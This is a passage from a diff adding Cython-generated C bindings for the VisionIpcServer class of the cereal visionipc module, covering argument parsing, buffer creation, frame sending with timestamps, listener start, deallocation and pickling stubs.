(unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "create_buffers_with_sizes") < 0)) __PYX_ERR(0, 72, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 8)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); + values[6] = __Pyx_Arg_FASTCALL(__pyx_args, 6); + values[7] = __Pyx_Arg_FASTCALL(__pyx_args, 7); + } + __pyx_v_tp = ((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)__Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(values[0])); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_v_num_buffers = __Pyx_PyInt_As_size_t(values[1]); if (unlikely((__pyx_v_num_buffers == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_v_rgb = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_rgb == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_v_width = __Pyx_PyInt_As_size_t(values[3]); if (unlikely((__pyx_v_width == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_v_height = __Pyx_PyInt_As_size_t(values[4]); if (unlikely((__pyx_v_height == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_v_size = __Pyx_PyInt_As_size_t(values[5]); if (unlikely((__pyx_v_size == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_v_stride = __Pyx_PyInt_As_size_t(values[6]); if (unlikely((__pyx_v_stride == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_v_uv_offset = __Pyx_PyInt_As_size_t(values[7]); if (unlikely((__pyx_v_uv_offset == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, __pyx_nargs); __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.create_buffers_with_sizes", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_4create_buffers_with_sizes(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self), __pyx_v_tp, __pyx_v_num_buffers, __pyx_v_rgb, __pyx_v_width, __pyx_v_height, __pyx_v_size, __pyx_v_stride, __pyx_v_uv_offset); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_4create_buffers_with_sizes(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp, size_t __pyx_v_num_buffers, bool __pyx_v_rgb, size_t __pyx_v_width, size_t __pyx_v_height, size_t __pyx_v_size, size_t __pyx_v_stride, size_t __pyx_v_uv_offset) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("create_buffers_with_sizes", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":73 + * + * def create_buffers_with_sizes(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height, size_t size, size_t stride, size_t uv_offset): + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) # <<<<<<<<<<<<<< + * + * def send(self, VisionStreamType tp, const unsigned char[:] data, uint32_t frame_id=0, uint64_t timestamp_sof=0, uint64_t timestamp_eof=0): + */ + __pyx_v_self->server->create_buffers_with_sizes(((enum VisionStreamType)__pyx_v_tp), __pyx_v_num_buffers, __pyx_v_rgb, __pyx_v_width, __pyx_v_height, __pyx_v_size, __pyx_v_stride, __pyx_v_uv_offset); + + /* "cereal/visionipc/visionipc_pyx.pyx":72 + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + * def create_buffers_with_sizes(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height, size_t size, size_t stride, size_t uv_offset): # <<<<<<<<<<<<<< + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":75 + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + * def send(self, VisionStreamType tp, const unsigned char[:] data, uint32_t frame_id=0, uint64_t timestamp_sof=0, uint64_t timestamp_eof=0): # <<<<<<<<<<<<<< + * cdef cppVisionBuf * buf = self.server.get_buffer(tp) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_7send(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_7send = {"send", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_7send, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_7send(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp; + __Pyx_memviewslice __pyx_v_data = { 0, 0, { 0 }, { 0 }, { 0 } }; + uint32_t __pyx_v_frame_id; + uint64_t __pyx_v_timestamp_sof; + uint64_t __pyx_v_timestamp_eof; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("send (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_tp,&__pyx_n_s_data,&__pyx_n_s_frame_id,&__pyx_n_s_timestamp_sof,&__pyx_n_s_timestamp_eof,0}; + PyObject* values[5] = {0,0,0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tp)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_data)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("send", 0, 2, 5, 1); __PYX_ERR(0, 75, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_frame_id); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_timestamp_sof); + if (value) { values[3] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_timestamp_eof); + if (value) { values[4] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "send") < 0)) __PYX_ERR(0, 75, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_tp = ((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)__Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(values[0])); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + __pyx_v_data = __Pyx_PyObject_to_MemoryviewSlice_ds_unsigned_char__const__(values[1], 0); if (unlikely(!__pyx_v_data.memview)) __PYX_ERR(0, 75, __pyx_L3_error) + if (values[2]) { + __pyx_v_frame_id = __Pyx_PyInt_As_uint32_t(values[2]); if (unlikely((__pyx_v_frame_id == ((uint32_t)-1)) && PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + } else { + __pyx_v_frame_id = ((uint32_t)0); + } + if (values[3]) { + __pyx_v_timestamp_sof = __Pyx_PyInt_As_uint64_t(values[3]); if (unlikely((__pyx_v_timestamp_sof == ((uint64_t)-1)) && PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + } else { + __pyx_v_timestamp_sof = ((uint64_t)0); + } + if (values[4]) { + __pyx_v_timestamp_eof = __Pyx_PyInt_As_uint64_t(values[4]); if (unlikely((__pyx_v_timestamp_eof == ((uint64_t)-1)) && PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) + } else { + __pyx_v_timestamp_eof = ((uint64_t)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("send", 0, 2, 5, __pyx_nargs); __PYX_ERR(0, 75, __pyx_L3_error) + __pyx_L3_error:; + __PYX_XCLEAR_MEMVIEW(&__pyx_v_data, 1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.send", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_6send(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self), __pyx_v_tp, __pyx_v_data, __pyx_v_frame_id, __pyx_v_timestamp_sof, __pyx_v_timestamp_eof); + + /* function exit code */ + __PYX_XCLEAR_MEMVIEW(&__pyx_v_data, 1); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_6send(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp, __Pyx_memviewslice __pyx_v_data, uint32_t __pyx_v_frame_id, uint64_t __pyx_v_timestamp_sof, uint64_t __pyx_v_timestamp_eof) { + VisionBuf *__pyx_v_buf; + struct VisionIpcBufExtra __pyx_v_extra; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("send", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":76 + * + * def send(self, VisionStreamType tp, const unsigned char[:] data, uint32_t frame_id=0, uint64_t timestamp_sof=0, uint64_t timestamp_eof=0): + * cdef cppVisionBuf * buf = self.server.get_buffer(tp) # <<<<<<<<<<<<<< + * + * # Populate buffer + */ + __pyx_v_buf = __pyx_v_self->server->get_buffer(((enum VisionStreamType)__pyx_v_tp)); + + /* "cereal/visionipc/visionipc_pyx.pyx":79 + * + * # Populate buffer + * assert buf.len == len(data) # <<<<<<<<<<<<<< + * memcpy(buf.addr, &data[0], len(data)) + * buf.set_frame_id(frame_id) + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = __Pyx_MemoryView_Len(__pyx_v_data); + __pyx_t_2 = (__pyx_v_buf->len == __pyx_t_1); + if (unlikely(!__pyx_t_2)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 79, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 79, __pyx_L1_error) + #endif + + /* "cereal/visionipc/visionipc_pyx.pyx":80 + * # Populate buffer + * assert buf.len == len(data) + * memcpy(buf.addr, &data[0], len(data)) # <<<<<<<<<<<<<< + * buf.set_frame_id(frame_id) + * + */ + __pyx_t_3 = 0; + __pyx_t_4 = -1; + if (__pyx_t_3 < 0) { + __pyx_t_3 += __pyx_v_data.shape[0]; + if (unlikely(__pyx_t_3 < 0)) __pyx_t_4 = 0; + } else if (unlikely(__pyx_t_3 >= __pyx_v_data.shape[0])) __pyx_t_4 = 0; + if (unlikely(__pyx_t_4 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_4); + __PYX_ERR(0, 80, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_MemoryView_Len(__pyx_v_data); + (void)(memcpy(__pyx_v_buf->addr, (&(*((unsigned char const *) ( /* dim=0 */ (__pyx_v_data.data + __pyx_t_3 * __pyx_v_data.strides[0]) )))), __pyx_t_1)); + + /* "cereal/visionipc/visionipc_pyx.pyx":81 + * assert buf.len == len(data) + * memcpy(buf.addr, &data[0], len(data)) + * buf.set_frame_id(frame_id) # <<<<<<<<<<<<<< + * + * cdef VisionIpcBufExtra extra + */ + __pyx_v_buf->set_frame_id(__pyx_v_frame_id); + + /* "cereal/visionipc/visionipc_pyx.pyx":84 + * + * cdef VisionIpcBufExtra extra + * extra.frame_id = frame_id # <<<<<<<<<<<<<< + * extra.timestamp_sof = timestamp_sof + * extra.timestamp_eof = timestamp_eof + */ + __pyx_v_extra.frame_id = __pyx_v_frame_id; + + /* "cereal/visionipc/visionipc_pyx.pyx":85 + * cdef VisionIpcBufExtra extra + * extra.frame_id = frame_id + * extra.timestamp_sof = timestamp_sof # <<<<<<<<<<<<<< + * extra.timestamp_eof = timestamp_eof + * + */ + __pyx_v_extra.timestamp_sof = __pyx_v_timestamp_sof; + + /* "cereal/visionipc/visionipc_pyx.pyx":86 + * extra.frame_id = frame_id + * extra.timestamp_sof = timestamp_sof + * extra.timestamp_eof = timestamp_eof # <<<<<<<<<<<<<< + * + * self.server.send(buf, &extra, False) + */ + __pyx_v_extra.timestamp_eof = __pyx_v_timestamp_eof; + + /* "cereal/visionipc/visionipc_pyx.pyx":88 + * extra.timestamp_eof = timestamp_eof + * + * self.server.send(buf, &extra, False) # <<<<<<<<<<<<<< + * + * def start_listener(self): + */ + __pyx_v_self->server->send(__pyx_v_buf, (&__pyx_v_extra), 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":75 + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + * def send(self, VisionStreamType tp, const unsigned char[:] data, uint32_t frame_id=0, uint64_t timestamp_sof=0, uint64_t timestamp_eof=0): # <<<<<<<<<<<<<< + * cdef cppVisionBuf * buf = self.server.get_buffer(tp) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.send", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":90 + * self.server.send(buf, &extra, False) + * + * def start_listener(self): # <<<<<<<<<<<<<< + * self.server.start_listener() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_9start_listener(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_9start_listener = {"start_listener", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_9start_listener, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_9start_listener(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("start_listener (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("start_listener", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "start_listener", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_8start_listener(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_8start_listener(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("start_listener", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":91 + * + * def start_listener(self): + * self.server.start_listener() # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __pyx_v_self->server->start_listener(); + + /* "cereal/visionipc/visionipc_pyx.pyx":90 + * self.server.send(buf, &extra, False) + * + * def start_listener(self): # <<<<<<<<<<<<<< + * self.server.start_listener() + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":93 + * self.server.start_listener() + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.server + * + */ + +/* Python wrapper */ +static void __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_11__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_11__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_10__dealloc__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_10__dealloc__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":94 + * + * def __dealloc__(self): + * del self.server # <<<<<<<<<<<<<< + * + * + */ + delete __pyx_v_self->server; + + /* "cereal/visionipc/visionipc_pyx.pyx":93 + * self.server.start_listener() + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.server + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_13__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_13__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_13__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_13__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_12__reduce_cython__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_12__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "self.server cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_server_cannot_be_converted, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_15__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_15__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_15__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_15__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto 